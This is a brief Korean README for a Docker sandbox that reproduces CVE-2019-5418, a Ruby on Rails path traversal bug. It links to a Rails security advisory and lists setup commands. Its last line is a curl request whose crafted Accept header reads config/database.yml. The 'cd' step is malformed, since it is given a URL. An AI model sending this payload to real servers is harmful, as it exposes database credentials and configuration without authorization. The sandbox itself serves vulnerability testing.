
Docker 기반 샌드박스로, 조작된 Accept 헤더를 통해 CVE-2019-5418 Ruby on Rails 경로 탐색 취약점을 재현하고 테스트합니다.
https://groups.google.com/forum/#!msg/rubyonrails-security/zRNVOUhKHrg/GmmcVXcmAAAJ
$ git clone https://github.com/takeokunn/CVE-2019-5418
$ cd https://github.com/takeokunn/CVE-2019-5418
$ docker-compose up
$ curl localhost/sandbox -H 'Accept: ../../config/database.yml{{'